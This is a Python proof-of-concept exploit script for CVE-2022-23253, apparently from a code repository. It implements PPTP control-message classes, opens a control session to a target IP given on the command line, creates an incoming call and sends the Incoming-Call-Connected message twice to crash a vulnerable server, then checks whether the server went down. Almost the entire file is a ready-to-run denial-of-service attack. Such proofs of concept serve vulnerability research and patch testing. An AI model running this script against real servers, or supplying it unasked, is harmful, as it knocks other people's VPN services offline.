README.md
Rendering markdown...
import socket
import select
import secrets
import struct
import argparse
# Default TCP port of the PPTP control (CTL) socket; main() may overwrite it
# from the --port command-line argument.
CTL_PORT = 1723
# Address of the target server; empty until main() fills it in from --ip.
TEST_SERVER = ""
# CTL message types (values written into the header's CtlMessageType field)
gStartControlConnectionRequest = 1
gStartControlConnectionReply = 2
gIncomingCallRequest = 9
gIncomingCallReply = 10
gIncomingCallConnected = 11
# Framing capabilities
gAsynchronousFraming = 0x1
gSynchronousFraming = 0x2
# Bearer capabilities
gAnalogAccessSupported = 0x1
gDigitalAccessSupported = 0x2
class CtlClient():
    """Small TCP client used to exchange control messages with a server.

    Attributes:
        IP: Address of the server to connect to.
        Port: TCP port of the server's control socket.
        Socket: The connected socket, or None before CtlConnect() succeeds.
        IsConnected: True once CtlConnect() has succeeded and until
            CtlCloseConn() is called.
    """

    def __init__(self, serverIp, serverPort=CTL_PORT):
        self.IP = serverIp
        self.Port = serverPort
        self.Socket = None
        self.IsConnected = False

    def CtlCloseConn(self):
        """Close the socket, if one was opened, and mark the client disconnected."""
        if self.Socket is not None:
            self.Socket.close()
        self.IsConnected = False

    def CtlSendMsg(self, CtlMessage, multiplier=1):
        """Send the bytes of ``CtlMessage.build()`` repeated ``multiplier`` times.

        Raises:
            RuntimeError: If the client is not connected.
        """
        if not self.IsConnected:
            raise RuntimeError("Attempted to send Ctl data on unconnected client")
        ctlmsgbuf: bytes = CtlMessage.build() * multiplier
        # sendall() keeps writing until the whole buffer is out; a plain
        # send() may transmit only a prefix of it.
        self.Socket.sendall(ctlmsgbuf)

    def CtlMultiSendMsg(self, CtlMessageArray):
        """Build every message in ``CtlMessageArray`` and send them as one buffer.

        Raises:
            RuntimeError: If the client is not connected.
        """
        if not self.IsConnected:
            raise RuntimeError("Attempted to send Ctl data on unconnected client")
        sendBuffer = b"".join(CtlMsg.build() for CtlMsg in CtlMessageArray)
        self.Socket.sendall(sendBuffer)

    def CtlRecvMsg(self):
        """Return whatever the server sends, or ``b""`` if nothing arrives in 1s.

        Data is read in 1024-byte chunks. A full chunk suggests more data may
        follow, so the socket is polled again (with the same one second limit)
        rather than issuing a recv() that could block forever when the reply
        happens to be an exact multiple of the chunk size.
        """
        chunks = []
        while select.select([self.Socket], [], [], 1)[0]:
            chunk = self.Socket.recv(1024)
            chunks.append(chunk)
            if len(chunk) < 1024:
                # Short (or empty, i.e. peer closed) read: nothing more queued.
                break
        return b"".join(chunks)

    def CtlConnect(self, timeout=None):
        """Open a TCP connection to ``(self.IP, self.Port)``.

        Args:
            timeout: Optional socket timeout in seconds; a falsy value leaves
                the socket in its default blocking mode.

        Raises:
            OSError: If the connection cannot be established. The half-open
                socket is closed before the error propagates.
        """
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            if timeout:
                sock.settimeout(timeout)
            sock.connect((self.IP, self.Port))
        except Exception:
            # Do not leak the descriptor when the connect attempt fails.
            sock.close()
            raise
        self.Socket = sock
        self.IsConnected = True
class ControlMessage():
    """The 12-byte header that starts every control message in this file.

    The header is serialised big-endian as: MessageLength (2 bytes),
    PptpMessageType (2), CtlMagic (4), CtlMessageType (2), Reserved0 (2).

    Args:
        messageType: Value stored in the CtlMessageType field.
        messageLength: Value stored in the MessageLength field.
        setSize: When true, build() overwrites MessageLength with the class
            level ``SIZE`` before serialising.
        packetBytes: Optional raw bytes to parse the header from. When given
            (and non-empty) the other arguments are ignored.

    Raises:
        struct.error: If ``packetBytes`` is non-empty but shorter than the
            12-byte header.
    """

    SIZE = 0xC # 12 byte header

    def __init__(self, messageType, messageLength, setSize=False, packetBytes=None):
        if packetBytes:
            # Start from zeroed fields, then fill them from the wire bytes.
            self.MessageLength = 0
            self.PptpMessageType = 0
            #Magic number
            self.CtlMagic = 0
            self.CtlMessageType = 0
            self.Reserved0 = 0
            self.SetSize = 0
            self.__fromBytes(packetBytes)
        else:
            self.MessageLength = messageLength
            self.PptpMessageType = 0x1
            #Magic number
            self.CtlMagic = 0x1A2B3C4D
            self.CtlMessageType = messageType
            self.Reserved0 = 0
            self.SetSize = setSize

    def build(self):
        """Return the 12 header bytes for this message."""
        if self.SetSize:
            # Use the preconfigured set size for this packet. This must be
            # ``self.SIZE``: inside a class body ``self.__SIZE`` is name-mangled
            # to ``_ControlMessage__SIZE``, which does not exist.
            # NOTE(review): on a subclass this resolves to the subclass's SIZE,
            # which in this file is the body length without the header.
            self.MessageLength = self.SIZE
        return struct.pack(
            ">HHIHH",
            self.MessageLength,
            self.PptpMessageType,
            self.CtlMagic,
            self.CtlMessageType,
            self.Reserved0,
        )

    def __fromBytes(self, bytebuffer):
        """Populate the header fields from the first 12 bytes of ``bytebuffer``."""
        (
            self.MessageLength,
            self.PptpMessageType,
            self.CtlMagic,
            self.CtlMessageType,
            self.Reserved0,
        ) = struct.unpack_from(">HHIHH", bytebuffer, 0)
class StartControlConnectionRequest(ControlMessage):
    """Control message of type ``gStartControlConnectionRequest``.

    The body built here is 0x90 bytes when ``hostName`` and ``vendorString``
    are 64 bytes each: six fixed-width integers followed by the two strings.
    The strings are appended as given; they are not padded or truncated.
    """

    SIZE = 0x90

    def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64):
        total_length = ControlMessage.SIZE + StartControlConnectionRequest.SIZE
        super().__init__(gStartControlConnectionRequest, total_length)
        self.protocolVersion = 0x100
        self.Reserved1 = 0
        self.FramingCapabilities = framing
        self.BearerCapabilities = bearer
        self.MaxChannels = maxChannels
        self.FirmwareRevision = firmwareRevision
        # 64 byte host name string
        self.HostName = hostName
        # 64 byte vendor string
        self.VendorString = vendorString

    def build(self):
        """Return the header followed by the serialised request body."""
        header = super().build()
        fixed_fields = struct.pack(
            ">HHIIHH",
            self.protocolVersion,
            self.Reserved1,
            self.FramingCapabilities,
            self.BearerCapabilities,
            self.MaxChannels,
            self.FirmwareRevision,
        )
        return header + fixed_fields + self.HostName + self.VendorString
class StartControlConnectionReply(ControlMessage):
    """Control message of type ``gStartControlConnectionReply``.

    Can be created from explicit field values, or parsed from raw bytes by
    passing a non-empty ``packetBytes`` (in which case the other arguments are
    ignored).

    Raises:
        struct.error: If ``packetBytes`` is non-empty but too short to hold
            the header plus the fixed-width part of the body.
    """

    SIZE = 0x90

    def __init__(self, framing=gAsynchronousFraming, bearer=gAnalogAccessSupported, maxChannels=0x0, firmwareRevision=0x0, hostName=b"A" * 64, vendorString=b"B" * 64, resultCode=0, errorCode=0, packetBytes=None):
        # Use this class's own SIZE for the length rather than the request's.
        super().__init__(gStartControlConnectionReply, ControlMessage.SIZE + StartControlConnectionReply.SIZE, packetBytes=packetBytes)
        if packetBytes:
            self.protocolVersion = 0
            self.ResultCode = 0
            self.ErrorCode = 0
            self.FramingCapabilities = 0
            self.BearerCapabilities = 0
            self.MaxChannels = 0
            self.FirmwareRevision = 0
            # Byte-string placeholders (not ints) so build() keeps working
            # even before/without a successful parse of these fields.
            self.HostName = b"" # 64 byte host name string
            self.VendorString = b"" # 64 byte vendor string
            self.__fromBytes(packetBytes)
        else:
            self.protocolVersion = 0x100
            self.ResultCode = resultCode
            self.ErrorCode = errorCode
            self.FramingCapabilities = framing
            self.BearerCapabilities = bearer
            self.MaxChannels = maxChannels
            self.FirmwareRevision = firmwareRevision
            self.HostName = hostName # 64 byte host name string
            self.VendorString = vendorString # 64 byte vendor string

    def build(self):
        """Return the header followed by the serialised reply body."""
        header = super().build()
        fixed_fields = struct.pack(
            ">HBBIIHH",
            self.protocolVersion,
            self.ResultCode,
            self.ErrorCode,
            self.FramingCapabilities,
            self.BearerCapabilities,
            self.MaxChannels,
            self.FirmwareRevision,
        )
        return header + fixed_fields + self.HostName + self.VendorString

    def __fromBytes(self, bytebuffer):
        """Populate the body fields from ``bytebuffer`` (header included)."""
        fixed_format = ">HBBIIHH"
        items = struct.unpack_from(fixed_format, bytebuffer, ControlMessage.SIZE)
        self.protocolVersion = items[0]
        self.ResultCode = items[1]
        self.ErrorCode = items[2]
        self.FramingCapabilities = items[3]
        self.BearerCapabilities = items[4]
        self.MaxChannels = items[5]
        self.FirmwareRevision = items[6]
        # The two 64-byte strings follow the fixed-width fields. Slicing is
        # used so a truncated reply yields short/empty strings instead of
        # raising.
        strings_at = ControlMessage.SIZE + struct.calcsize(fixed_format)
        self.HostName = bytes(bytebuffer[strings_at:strings_at + 64])
        self.VendorString = bytes(bytebuffer[strings_at + 64:strings_at + 128])
class IncomingCallRequest(ControlMessage):
    """Control message of type ``gIncomingCallRequest``.

    With the default 64-byte strings the body is 0xD0 bytes: six fixed-width
    integers followed by DialedNumber, DialingNumber and Subaddress.

    ``packetBytes`` is forwarded to the header parser only; the body fields
    are always taken from the keyword arguments.
    """

    SIZE = 0xD0

    def __init__(self,CallId=1337, CallSerialNumber=1338, CallBearerType=gAnalogAccessSupported, PhysicalChannelId=0, DialedNumberLength=64, DialingNumberLength=64,DialedNumber=64 *b"A", DialingNumber = 64 * b"B", Subaddress= 64 * b"C", packetBytes=None):
        total_length = IncomingCallRequest.SIZE + ControlMessage.SIZE
        super().__init__(gIncomingCallRequest, total_length, packetBytes=packetBytes)
        # Call identification
        self.CallId = CallId
        self.CallSerialNumber = CallSerialNumber
        self.CallBearerType = CallBearerType
        self.PhysicalChannelId = PhysicalChannelId
        # Declared lengths, followed by the strings themselves
        self.DialedNumberLength = DialedNumberLength
        self.DialingNumberLength = DialingNumberLength
        self.DialedNumber = DialedNumber
        self.DialingNumber = DialingNumber
        self.Subaddress = Subaddress

    def build(self):
        """Return the header followed by the serialised request body."""
        header = super().build()
        fixed_fields = struct.pack(
            ">HHIIHH",
            self.CallId,
            self.CallSerialNumber,
            self.CallBearerType,
            self.PhysicalChannelId,
            self.DialedNumberLength,
            self.DialingNumberLength,
        )
        return header + fixed_fields + self.DialedNumber + self.DialingNumber + self.Subaddress
class IncomingCallReply(ControlMessage):
    """Control message of type ``gIncomingCallReply``.

    Can be created from explicit field values, or parsed from raw bytes by
    passing a non-empty ``packetBytes`` (in which case the other arguments are
    ignored).

    Raises:
        struct.error: If ``packetBytes`` is non-empty but too short to hold
            the header plus the 12-byte body.
    """

    SIZE = 0xC

    def __init__(self,CallId=0x1337, PeersCallId=0x1338, ResultCode=1, ErrorCode=0, PacketRecvWindowSize=64, PacketTransitDelay=32, packetBytes=None):
        super().__init__(gIncomingCallReply, IncomingCallReply.SIZE + ControlMessage.SIZE, packetBytes=packetBytes)
        if packetBytes:
            # Zero everything first, then overwrite from the wire bytes.
            self.CallId = 0
            self.PeersCallId = 0
            self.ResultCode = 0
            self.ErrorCode = 0
            self.PacketRecvWindowSize = 0
            self.PacketTransitDelay = 0
            self.Reserved1 = 0
            self.fromBytes(packetBytes)
        else:
            self.CallId = CallId
            self.PeersCallId = PeersCallId
            self.ResultCode = ResultCode
            self.ErrorCode = ErrorCode
            # Must be a plain int: a stray trailing comma here would store a
            # one-element tuple, which struct.pack(">H", ...) rejects.
            self.PacketRecvWindowSize = PacketRecvWindowSize
            self.PacketTransitDelay = PacketTransitDelay
            self.Reserved1 = 0

    def build(self):
        """Return the header followed by the serialised reply body."""
        header = super().build()
        body = struct.pack(
            ">HHBBHHH",
            self.CallId,
            self.PeersCallId,
            self.ResultCode,
            self.ErrorCode,
            self.PacketRecvWindowSize,
            self.PacketTransitDelay,
            self.Reserved1,
        )
        return header + body

    def fromBytes(self, bytebuffer):
        """Populate the body fields from ``bytebuffer`` (header included)."""
        (
            self.CallId,
            self.PeersCallId,
            self.ResultCode,
            self.ErrorCode,
            self.PacketRecvWindowSize,
            self.PacketTransitDelay,
            self.Reserved1,
        ) = struct.unpack_from(">HHBBHHH", bytebuffer, ControlMessage.SIZE)
class IncomingCallConnected(ControlMessage):
    """Control message of type ``gIncomingCallConnected`` (0x10-byte body).

    NOTE: when a non-empty ``packetBytes`` is supplied only the header is
    parsed; none of the body attributes are set, so build() cannot be used on
    such an instance.
    """

    SIZE = 0x10

    def __init__(self,PeerCallId=1337, ConnectSpeed=1, PacketRecvWindowsSize=64, PacketTransmitDelay=0, FramingType = gAsynchronousFraming, packetBytes=None):
        total_length = IncomingCallConnected.SIZE + ControlMessage.SIZE
        super().__init__(gIncomingCallConnected, total_length, packetBytes=packetBytes)
        if not packetBytes:
            self.PeerCallId = PeerCallId
            self.Reserved1 = 0
            self.ConnectSpeed = ConnectSpeed
            self.PacketRecvWindowSize = PacketRecvWindowsSize
            self.PacketTransmitDelay = PacketTransmitDelay
            self.FramingType = FramingType

    def build(self):
        """Return the header followed by the serialised body."""
        header = super().build()
        body = struct.pack(
            ">HHIHHI",
            self.PeerCallId,
            self.Reserved1,
            self.ConnectSpeed,
            self.PacketRecvWindowSize,
            self.PacketTransmitDelay,
            self.FramingType,
        )
        return header + body
def startControlSession():
    """Connect to TEST_SERVER and perform the start-control-connection exchange.

    Returns:
        The connected CtlClient, ready for further control messages.

    Raises:
        ValueError: If the server's reply carries a non-zero error code or a
            result code other than 1. The connection is closed first.
    """
    # Pass the port explicitly: CtlClient's default was bound when the class
    # was defined, so it would not reflect a CTL_PORT changed by main().
    pocClient = CtlClient(TEST_SERVER, CTL_PORT)
    initializeCtlConnection = StartControlConnectionRequest()
    pocClient.CtlConnect()
    try:
        pocClient.CtlSendMsg(initializeCtlConnection)
        StartControlReply_raw = pocClient.CtlRecvMsg()
        initializeCtlResponse = StartControlConnectionReply(packetBytes=StartControlReply_raw)
        if initializeCtlResponse.ErrorCode != 0 or initializeCtlResponse.ResultCode != 1:
            raise ValueError("[:(] PoC Failed unexpectadly due to server side error, investigation reqiured....")
    except Exception:
        # The caller never receives the client on failure, so release the
        # socket here instead of leaking it.
        pocClient.CtlCloseConn()
        raise
    return pocClient
def poke_server():
    """Report whether TEST_SERVER still accepts a TCP connection within 1s.

    Prints the outcome; returns nothing. The probe socket is always closed.
    """
    print("[+] Pokeing the target....")
    # Pass the port explicitly so a CTL_PORT changed by main() is honoured.
    poke_client = CtlClient(TEST_SERVER, CTL_PORT)
    try:
        poke_client.CtlConnect(timeout=1)
    except OSError:
        # Connection refused / timed out / unreachable. Other exception types
        # indicate a programming error and are deliberately not reported as
        # a dead server.
        print("[+] Yep, its dead")
    else:
        print("[-] Its alive!?")
    finally:
        if poke_client.Socket is not None:
            poke_client.CtlCloseConn()
def trigger_cve_2022_23253():
    """Run the PoC sequence against TEST_SERVER and then probe the server.

    Steps: open a control session, send an incoming-call request, check the
    reply, send the same incoming-call-connected message twice, then call
    poke_server().

    Raises:
        ValueError: If no reply to the incoming-call request is received, or
            the reply reports a result code other than 1 or a non-zero error
            code.
    """
    print("[+] Starting PPTP control connection")
    pocClient = startControlSession()
    try:
        newCallId = secrets.randbelow(0x10000)
        newCallSerial = secrets.randbelow(0x10000)
        newIncomingCall = IncomingCallRequest(CallId=newCallId,CallSerialNumber=newCallSerial) #Requests Causing Issues
        print("[+] Creating new incoming call")
        pocClient.CtlSendMsg(newIncomingCall)
        ICReply_raw = pocClient.CtlRecvMsg()
        if not ICReply_raw:
            # An empty buffer would otherwise be turned into a default reply
            # object that looks like a success.
            raise ValueError("[:(] PoC failed: no incoming call reply received from the server")
        newIncomingCallReply = IncomingCallReply(packetBytes=ICReply_raw)
        print("[+] Incoming call reply received with call ID {}".format(newIncomingCallReply.CallId))
        if newIncomingCallReply.ResultCode != 1 or newIncomingCallReply.ErrorCode != 0:
            raise ValueError("[:(] PoC failed unexpecadle due to server side error... ")
        newIncomingCallConnected = IncomingCallConnected(newIncomingCallReply.CallId, 64, newIncomingCallReply.PacketRecvWindowSize, newIncomingCallReply.PacketTransitDelay)
        print("[+] Triggering Bug!")
        # The message is intentionally sent twice.
        pocClient.CtlSendMsg(newIncomingCallConnected)
        pocClient.CtlSendMsg(newIncomingCallConnected)
        print("[+] Machine should be dead now, lets check!")
        poke_server()
    finally:
        # Release the control connection once the whole sequence is over.
        pocClient.CtlCloseConn()
def main():
    """Parse the command line, ask for confirmation, then run the PoC.

    Stores --ip and --port in the module-level TEST_SERVER and CTL_PORT.
    Anything other than "y"/"Y" at the prompt exits without touching the
    target.
    """
    global TEST_SERVER, CTL_PORT

    parser = argparse.ArgumentParser(description="PoC for CVE-2022-23253!")
    parser.add_argument(
        '--ip',
        type=str,
        required=True,
        dest="ip_address",
        help="IP address of the target server",
    )
    parser.add_argument(
        '--port',
        type=int,
        default=CTL_PORT,
        dest="ctl_port",
        help="Port of the PPTP CTL TCP socket, should remain as {} in most cases.".format(CTL_PORT),
    )
    args = parser.parse_args()
    TEST_SERVER = args.ip_address
    CTL_PORT = args.ctl_port

    answer = input("[?] This PoC will crash a vulnerable server, do you want to continue [y/n]: ")
    if answer.lower() != "y":
        print("[+] GoodBye!")
        return

    print("[+] Triggering Bug!")
    trigger_cve_2022_23253()
# Run the command-line entry point only when executed as a script.
if "__main__" == __name__:
    main()